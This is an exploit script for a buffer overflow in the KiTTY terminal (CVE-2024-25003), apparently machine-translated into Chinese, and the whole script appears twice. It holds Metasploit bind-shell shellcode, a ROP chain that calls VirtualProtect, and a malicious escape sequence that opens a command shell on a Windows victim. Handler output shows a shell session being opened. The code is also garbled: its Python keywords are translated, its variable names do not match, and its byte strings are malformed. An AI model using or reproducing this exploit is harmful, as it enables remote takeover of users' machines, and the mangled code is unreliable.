#利用title: kitty 0.76.1.13-'启动重复的会话主机名'缓冲区溢出
#利用作者: DeFcesco(Austin A. Defrancesco)
#供应商homepage: https://github.com/cyd01/kitty/=
#软件link: https://github.com/cyd01/kitty/releases/download/v0.76.1.1.13/kitty-bin-0.76.1.1.13.zip
#版本:≤0.76.1.13
#测试在: Microsoft Windows 11/10/8/7/XP
#CVE: 2024-25003
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#blog: https://blog.defcesco.io/hell0+kitty
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#MSF6有效载荷(Windows/shell_bind_tcp)to_handler#
#[*]有效载荷处理程序开始为作业1#
#MSF6有效载荷(Windows/shell_bind_tcp)#
#[*]开始绑定TCP处理程序,与192.168.100.28:444#
#[*]命令壳会话1打开(192.168.100.119:39315-192.168.100.283:444)#
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
导入系统
导入操作系统
导入结构
#------------------------------------------------------------------------------------------------------------------------------------------------------#
#msf6有效载荷(Windows/shell_bind_tcp)生成-b'\ x00 \ x07 \ x0a \ x0a \ x0d \ x1b \ x9c \ x9c \ x3a \ x40'-f py##
#Windows/shell_bind_tcp -375字节#
#https://metasploit.com/#
#encoder: x86/xor_poly#
#verbose=false,lport=4444,rhost=192.168.100.28,#
#prependmigrate=false,exitfunc=process,createSession=true,#
#autoverifySession=true#
#------------------------------------------------------------------------------------------------------------------------------------------------------#
buf=b''
buf +=b'\ x51 \ x53 \ x56 \ x57 \ xdb \ xd9 \ x74 \ x74 \ x24 \ xf4 \ xf4 \ x5f \ x41'
buf +=b'\ x49 \ x31 \ xc9 \ x51 \ x59 \ x90 \ x90 \ x90 \ x81 \ x81 \ xe9 \ xae \ xae \ xff \ xff \ xff'
buf +=b'\ xff \ xbe \ xd4 \ xa1 \ xc4 \ xf4 \ x31 \ x31 \ x77 \ x2b \ x83 \ x83 \ xef \ xfc'
buf +=b'\ x51 \ x59 \ x90 \ xff \ xc9 \ x75 \ xf3 \ xf3 \ x5f \ x5e \ x5b \ x5b \ x59 \ x59 \ x28'
buf +=b'\ x49 \ x46 \ xf4 \ xd4 \ xd4 \ xa1 \ xa4 \ x7d \ x31 \ x31 \ x90 \ x90 \ x04 \ x90 \ x90 \ x5f'
buf +=b'\ xf1 \ xf4 \ x7f \ x86 \ xad \ x4f \ x4f \ xa6 \ xc0 \ xc0 \ x2a \ xb6 \ xb6 \ xdc \ xdb'
buf +=b'\ x16 \ x8e \ xd2 \ xe5 \ x5e \ x68 \ xc8 \ xc8 \ xb5 \ xdd \ xdd \ xc6 \ xd8 \ xd8 \ xf4'
buf +=b'\ x60 \ x0b \ xf9 \ xd5 \ x66 \ x26 \ x26 \ x06 \ x86 \ x86 \ x4f \ x4f \ xa6 \ xc4'
buf +=b'\ x2a \ x8e \ xc8 \ x5f \ xed \ xd5 \ x8c \ x8c \ x37 \ xe9 \ xc5 \ xc5 \ x25 \ x85'
buf +=b'\ x2a \ x9d \ xd4 \ xd5 \ x72 \ x4f \ x4f \ xbd \ xcc \ xcc \ x42 \ xfe \ xfe \ xbd \ xbd \ x5f'
buf +=b'\ x95 \ x4f \ xf5 \ x02 \ x90 \ x3b \ x58 \ x58 \ x15 \ x6e \ x6e \ xc9 \ xf5 \ xf5 \ x13'
buf +=b'\ x99 \ x24 \ x81 \ x22 \ xa2 \ xb9 \ xb9 \ x0c \ xef \ xdc \ xdc \ xe0 \ x81 \ x81 \ x30'
buf +=b'\ xf9 \ x4f \ xac \ xf0 \ xa0 \ x17 \ x92 \ x92 \ x5f \ xad \ x8f \ x8f \ x7f \ x7f \ x8c'
buf +=b'\ xbd \ xc5 \ x27 \ x5f \ xa5 \ x4f \ x4f \ xf5 \ x04 \ x28 \ x28 \ x80 \ xd0 \ xd0 \ xf0'
buf +=b'\ xfa \ x9f \ x95 \ x8d \ xfb \ x95 \ x95 \ x0b \ x34 \ xfe \ xfe \ x9b \ xae \ xae \ x5f'
buf +=b'\ xb3 \ x2f \ x79 \ x89 \ xc9 \ xc9 \ xf7 \ xc6 \ xd4 \ xd4 \ xa1 \ xa1 \ xac \ x83 \ xa7''
buf +=b'\ x93 \ x9b \ xa0 \ xbc \ xed \ xb3 \ xd2 \ xd2 \ xd3 \ x5e \ x5e \ x11 \ x4c \ x4c \ x44'
buf +=b'\ xa0 \ xc4 \ xf4 \ xfd \ x65 \ x90 \ x90 \ xa4 \ xbc \ x88 \ x44 \ x44 \ x9f \ xd4'
buf +=b'\ x5e \ x11 \ x9e \ xdc \ xf8 \ x94 \ x94 \ x16 \ x29 \ xe1 \ xe1 \ x94 \ xb4 \ xb4 \ x84'
buf +=b'\ xc9 \ x2e \ xfb \ x0b \ x41 \ x3b \ x3b \ x21 \ x43 \ xc9 \ xc9 \ xc6 \ xc6 \ xf4 \ xc5'
buf +=b'\ xfd \ x4d \ x12 \ xbe \ xb1 \ x92 \ xa3 \ xbc \ xbc \ x63 \ x1f \ x1f \ xc3 \ xb3'
buf +=b'\ x5e \ x11 \ xa3 \ xbc \ x16 \ x2d \ xcc \ xcc \ x2b \ x5e \ x5e \ x11 \ xa3 \ xbc'
buf +=b'\ xd5 \ x28 \ xcf \ x35 \ x5e \ x5e \ x11 \ xa3 \ x43 \ x43 \ xc9 \ xb1 \ xb1 \ x9a \ x99'
buf +=b'\ xc0 \ x3b \ x21 \ xbc \ xc2 \ xa9 \ x90 \ xd4 \ xd4 \ x28 \ x27 \ x27 \ xa3 \ x83'
buf +=b'\ xf6 \ xf5 \ x02 \ xbe \ xb3 \ x9d \ x9d \ xa2 \ x36 \ x36 \ x5c \ xa2 \ xa2 \ x33 \ x90'
buf +=b'\ x85 \ xf8 \ xf5 \ xd5 \ x2c \ x80 \ xd0 \ xd0 \ xc4 \ x67 \ x67 \ xc4 \ xc4 \ xb0 \ x80'
buf +=b'\ xf1 \ x92 \ xa2 \ x82 \ xe7 \ x92 \ xba \ xba \ x82 \ xf7 \ xf7 \ x97 \ x97 \ xa2 \ xbc'
buf +=b'\ xd8 \ x08 \ xcb \ x52 \ x5e \ x5e \ x11 \ x7d \ x34 \ x34 \ xef \ x92 \ xb2 \ xb2 \ x2b'
buf +=b'\ x91 \ xac \ xfc \ x53 \ xbc \ xa4 \ x0b \ x01 \ x01 \ x1a \ x1a \ x34 \ x34 \ x41 \ x76'
buf +=b'\ xf7 \ xac \ x52 \ x41 \ x1c \ x59 \ x59 \ x0b \ x01 \ x9d \ x9d \ xc2 \ x88 \ xde'
buf +=b'\ x21 \ x3f \ x14 \ xa1 \ xa4 \ x7f \ xb3 \ xc7 \ xc7 \ xd3 \ xab \ xab \ x9e \ xd4'
buf +=b'\ xf2 \ x3b \ x21'
def shellCode():
SC=B''
sc +=b'\ xbb \ x44 \ x24 \ x44 \ x44'#mov ebx,0x4444424444
sc +=b'\ xb8 \ x44 \ x44 \ x44 \ x44'#mov eax,0x4444444444444
sc +=b'\ x29 \ xd8'#sub eax,ebx
sc +=b'\ x29 \ xc4'#sub esp,eax
sc +=buf
sc +=b'\ x90' *(1052-len(sc))
断言Len(SC)==1052
返回SC
def create_rop_chain():
#由mona.py生成的rop链-www.corelan.be
rop_gadgets=[
#[--- INFO:GADGETS_TO_SET_ESI: ---]
0x004c5832,#pop eax#添加ESP,14#pop ebx#pop esi#retn [kitty.exe]
0x006424a4,#ptr to virtualProtect()[iat kitty.exe]
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x00484E07,#MOV EAX,DWORD PTR DS: [EAX]#retn [Kitty.exe]
0x00473cf6,#xchg eax,esi#retn [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBP: ---]
0x00429953,#pop ebp#retn [kitty.exe]
0x005405b0,#PUSH ESP; ret 0 [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBX: ---]
0x0049d9f9,#pop ebx#retn [kitty.exe]
0x00000201,#0x00000201- EBX
#[--- INFO:GADGETS_TO_SET_EDX: ---]
0x00430dce,#pop edx#retn [kitty.exe]
0x00000040,#0x00000040- EDX
#[--- INFO:GADGETS_TO_SET_ECX: ---]
0x005ac58c,#pop ecx#retn [kitty.exe]
0x004d81d9,#可写的位置[kitty.exe]
#[--- INFO:GADGETS_TO_SET_EDI: ---]
0x004fa404,#pop edi#retn [kitty.exe]
0x005A2001,#retn(rop nop)[kitty.exe]
#[--- INFO:GADGETS_TO_SET_EAX: ---]
0x004CD011,#POP EAX#POP EBX#retn [kitty.exe]
0x90909090,#nop
0x41414141,#填充(补偿)
#[--- INFO
USHAD: ---]
0x005dfbac,#pushad#retn [kitty.exe]
这是给出的
返回b''。join(struct.pack('i',), in rop_gadgets)
rop_chain=create_rop_chain()
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
#badchars: \ x00 \ x07 \ x0a \ x0d \ x1b \ x9c \ x3a \ x3a \ x40#
#返回地址信息:0x0052033C : {pivot 332 /0x14c} :#
#添加ESP,13C#POP EBX#POP ESI#POP EDI#POP EBP#retn#
#** [kitty.exe] ** | startnull,ascii {page_execute_readwrite}#
#ESP: 1052#的ShellCode尺寸
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
return_address=struct.pack('i',0x0052033c)#添加ESP,13c#pop ebx#pop esi#pop edi#pop edi#pop ebp#retn ** [kitty.exe] ** | startnull,ascii {page_execute_readwrite}
rop_chain_padding=b'\ x90' * 35
nops=b'\ x90' * 88
Escape_sequence=B'\ 033] 0; __ DT:' + shellCode() + return_address
evase_sequence +=rop_chain_padding + rop_chain
Escape_sequence +=B'\ x90'
Escape_sequence +=B'\ Xe9 \ X2A \ XFA \ XFF \ XFF'#JMP $ EIP-1490
Escape_sequence +=NOPS + B'\ 007'
stdout=os.fdopen(sys.stdout.fileno(),'wb')
stdout.write(easse_sequence)
stdout.flush()
#利用作者: DeFcesco(Austin A. Defrancesco)
#供应商homepage: https://github.com/cyd01/kitty/=
#软件link: https://github.com/cyd01/kitty/releases/download/v0.76.1.1.13/kitty-bin-0.76.1.1.13.zip
#版本:≤0.76.1.13
#测试在: Microsoft Windows 11/10/8/7/XP
#CVE: 2024-25003
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#blog: https://blog.defcesco.io/hell0+kitty
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
#MSF6有效载荷(Windows/shell_bind_tcp)to_handler#
#[*]有效载荷处理程序开始为作业1#
#MSF6有效载荷(Windows/shell_bind_tcp)#
#[*]开始绑定TCP处理程序,与192.168.100.28:444#
#[*]命令壳会话1打开(192.168.100.119:39315-192.168.100.283:444)#
#-----------------------------------------------------------------------------------------------------------------------------------------------------#
导入系统
导入操作系统
导入结构
#------------------------------------------------------------------------------------------------------------------------------------------------------#
#msf6有效载荷(Windows/shell_bind_tcp)生成-b'\ x00 \ x07 \ x0a \ x0a \ x0d \ x1b \ x9c \ x9c \ x3a \ x40'-f py##
#Windows/shell_bind_tcp -375字节#
#https://metasploit.com/#
#encoder: x86/xor_poly#
#verbose=false,lport=4444,rhost=192.168.100.28,#
#prependmigrate=false,exitfunc=process,createSession=true,#
#autoverifySession=true#
#------------------------------------------------------------------------------------------------------------------------------------------------------#
buf=b''
buf +=b'\ x51 \ x53 \ x56 \ x57 \ xdb \ xd9 \ x74 \ x74 \ x24 \ xf4 \ xf4 \ x5f \ x41'
buf +=b'\ x49 \ x31 \ xc9 \ x51 \ x59 \ x90 \ x90 \ x90 \ x81 \ x81 \ xe9 \ xae \ xae \ xff \ xff \ xff'
buf +=b'\ xff \ xbe \ xd4 \ xa1 \ xc4 \ xf4 \ x31 \ x31 \ x77 \ x2b \ x83 \ x83 \ xef \ xfc'
buf +=b'\ x51 \ x59 \ x90 \ xff \ xc9 \ x75 \ xf3 \ xf3 \ x5f \ x5e \ x5b \ x5b \ x59 \ x59 \ x28'
buf +=b'\ x49 \ x46 \ xf4 \ xd4 \ xd4 \ xa1 \ xa4 \ x7d \ x31 \ x31 \ x90 \ x90 \ x04 \ x90 \ x90 \ x5f'
buf +=b'\ xf1 \ xf4 \ x7f \ x86 \ xad \ x4f \ x4f \ xa6 \ xc0 \ xc0 \ x2a \ xb6 \ xb6 \ xdc \ xdb'
buf +=b'\ x16 \ x8e \ xd2 \ xe5 \ x5e \ x68 \ xc8 \ xc8 \ xb5 \ xdd \ xdd \ xc6 \ xd8 \ xd8 \ xf4'
buf +=b'\ x60 \ x0b \ xf9 \ xd5 \ x66 \ x26 \ x26 \ x06 \ x86 \ x86 \ x4f \ x4f \ xa6 \ xc4'
buf +=b'\ x2a \ x8e \ xc8 \ x5f \ xed \ xd5 \ x8c \ x8c \ x37 \ xe9 \ xc5 \ xc5 \ x25 \ x85'
buf +=b'\ x2a \ x9d \ xd4 \ xd5 \ x72 \ x4f \ x4f \ xbd \ xcc \ xcc \ x42 \ xfe \ xfe \ xbd \ xbd \ x5f'
buf +=b'\ x95 \ x4f \ xf5 \ x02 \ x90 \ x3b \ x58 \ x58 \ x15 \ x6e \ x6e \ xc9 \ xf5 \ xf5 \ x13'
buf +=b'\ x99 \ x24 \ x81 \ x22 \ xa2 \ xb9 \ xb9 \ x0c \ xef \ xdc \ xdc \ xe0 \ x81 \ x81 \ x30'
buf +=b'\ xf9 \ x4f \ xac \ xf0 \ xa0 \ x17 \ x92 \ x92 \ x5f \ xad \ x8f \ x8f \ x7f \ x7f \ x8c'
buf +=b'\ xbd \ xc5 \ x27 \ x5f \ xa5 \ x4f \ x4f \ xf5 \ x04 \ x28 \ x28 \ x80 \ xd0 \ xd0 \ xf0'
buf +=b'\ xfa \ x9f \ x95 \ x8d \ xfb \ x95 \ x95 \ x0b \ x34 \ xfe \ xfe \ x9b \ xae \ xae \ x5f'
buf +=b'\ xb3 \ x2f \ x79 \ x89 \ xc9 \ xc9 \ xf7 \ xc6 \ xd4 \ xd4 \ xa1 \ xa1 \ xac \ x83 \ xa7''
buf +=b'\ x93 \ x9b \ xa0 \ xbc \ xed \ xb3 \ xd2 \ xd2 \ xd3 \ x5e \ x5e \ x11 \ x4c \ x4c \ x44'
buf +=b'\ xa0 \ xc4 \ xf4 \ xfd \ x65 \ x90 \ x90 \ xa4 \ xbc \ x88 \ x44 \ x44 \ x9f \ xd4'
buf +=b'\ x5e \ x11 \ x9e \ xdc \ xf8 \ x94 \ x94 \ x16 \ x29 \ xe1 \ xe1 \ x94 \ xb4 \ xb4 \ x84'
buf +=b'\ xc9 \ x2e \ xfb \ x0b \ x41 \ x3b \ x3b \ x21 \ x43 \ xc9 \ xc9 \ xc6 \ xc6 \ xf4 \ xc5'
buf +=b'\ xfd \ x4d \ x12 \ xbe \ xb1 \ x92 \ xa3 \ xbc \ xbc \ x63 \ x1f \ x1f \ xc3 \ xb3'
buf +=b'\ x5e \ x11 \ xa3 \ xbc \ x16 \ x2d \ xcc \ xcc \ x2b \ x5e \ x5e \ x11 \ xa3 \ xbc'
buf +=b'\ xd5 \ x28 \ xcf \ x35 \ x5e \ x5e \ x11 \ xa3 \ x43 \ x43 \ xc9 \ xb1 \ xb1 \ x9a \ x99'
buf +=b'\ xc0 \ x3b \ x21 \ xbc \ xc2 \ xa9 \ x90 \ xd4 \ xd4 \ x28 \ x27 \ x27 \ xa3 \ x83'
buf +=b'\ xf6 \ xf5 \ x02 \ xbe \ xb3 \ x9d \ x9d \ xa2 \ x36 \ x36 \ x5c \ xa2 \ xa2 \ x33 \ x90'
buf +=b'\ x85 \ xf8 \ xf5 \ xd5 \ x2c \ x80 \ xd0 \ xd0 \ xc4 \ x67 \ x67 \ xc4 \ xc4 \ xb0 \ x80'
buf +=b'\ xf1 \ x92 \ xa2 \ x82 \ xe7 \ x92 \ xba \ xba \ x82 \ xf7 \ xf7 \ x97 \ x97 \ xa2 \ xbc'
buf +=b'\ xd8 \ x08 \ xcb \ x52 \ x5e \ x5e \ x11 \ x7d \ x34 \ x34 \ xef \ x92 \ xb2 \ xb2 \ x2b'
buf +=b'\ x91 \ xac \ xfc \ x53 \ xbc \ xa4 \ x0b \ x01 \ x01 \ x1a \ x1a \ x34 \ x34 \ x41 \ x76'
buf +=b'\ xf7 \ xac \ x52 \ x41 \ x1c \ x59 \ x59 \ x0b \ x01 \ x9d \ x9d \ xc2 \ x88 \ xde'
buf +=b'\ x21 \ x3f \ x14 \ xa1 \ xa4 \ x7f \ xb3 \ xc7 \ xc7 \ xd3 \ xab \ xab \ x9e \ xd4'
buf +=b'\ xf2 \ x3b \ x21'
def shellCode():
SC=B''
sc +=b'\ xbb \ x44 \ x24 \ x44 \ x44'#mov ebx,0x4444424444
sc +=b'\ xb8 \ x44 \ x44 \ x44 \ x44'#mov eax,0x4444444444444
sc +=b'\ x29 \ xd8'#sub eax,ebx
sc +=b'\ x29 \ xc4'#sub esp,eax
sc +=buf
sc +=b'\ x90' *(1052-len(sc))
断言Len(SC)==1052
返回SC
def create_rop_chain():
#由mona.py生成的rop链-www.corelan.be
rop_gadgets=[
#[--- INFO:GADGETS_TO_SET_ESI: ---]
0x004c5832,#pop eax#添加ESP,14#pop ebx#pop esi#retn [kitty.exe]
0x006424a4,#ptr to virtualProtect()[iat kitty.exe]
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x41414141,#填充(补偿)
0x00484E07,#MOV EAX,DWORD PTR DS: [EAX]#retn [Kitty.exe]
0x00473cf6,#xchg eax,esi#retn [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBP: ---]
0x00429953,#pop ebp#retn [kitty.exe]
0x005405b0,#PUSH ESP; ret 0 [kitty.exe]
#[--- INFO:GADGETS_TO_SET_EBX: ---]
0x0049d9f9,#pop ebx#retn [kitty.exe]
0x00000201,#0x00000201- EBX
#[--- INFO:GADGETS_TO_SET_EDX: ---]
0x00430dce,#pop edx#retn [kitty.exe]
0x00000040,#0x00000040- EDX
#[--- INFO:GADGETS_TO_SET_ECX: ---]
0x005ac58c,#pop ecx#retn [kitty.exe]
0x004d81d9,#可写的位置[kitty.exe]
#[--- INFO:GADGETS_TO_SET_EDI: ---]
0x004fa404,#pop edi#retn [kitty.exe]
0x005A2001,#retn(rop nop)[kitty.exe]
#[--- INFO:GADGETS_TO_SET_EAX: ---]
0x004CD011,#POP EAX#POP EBX#retn [kitty.exe]
0x90909090,#nop
0x41414141,#填充(补偿)
#[--- INFO
USHAD: ---]0x005dfbac,#pushad#retn [kitty.exe]
这是给出的
返回b''。join(struct.pack('i',), in rop_gadgets)
rop_chain=create_rop_chain()
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
#badchars: \ x00 \ x07 \ x0a \ x0d \ x1b \ x9c \ x3a \ x3a \ x40#
#返回地址信息:0x0052033C : {pivot 332 /0x14c} :#
#添加ESP,13C#POP EBX#POP ESI#POP EDI#POP EBP#retn#
#** [kitty.exe] ** | startnull,ascii {page_execute_readwrite}#
#ESP: 1052#的ShellCode尺寸
#-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
return_address=struct.pack('i',0x0052033c)#添加ESP,13c#pop ebx#pop esi#pop edi#pop edi#pop ebp#retn ** [kitty.exe] ** | startnull,ascii {page_execute_readwrite}
rop_chain_padding=b'\ x90' * 35
nops=b'\ x90' * 88
Escape_sequence=B'\ 033] 0; __ DT:' + shellCode() + return_address
evase_sequence +=rop_chain_padding + rop_chain
Escape_sequence +=B'\ x90'
Escape_sequence +=B'\ Xe9 \ X2A \ XFA \ XFF \ XFF'#JMP $ EIP-1490
Escape_sequence +=NOPS + B'\ 007'
stdout=os.fdopen(sys.stdout.fileno(),'wb')
stdout.write(easse_sequence)
stdout.flush()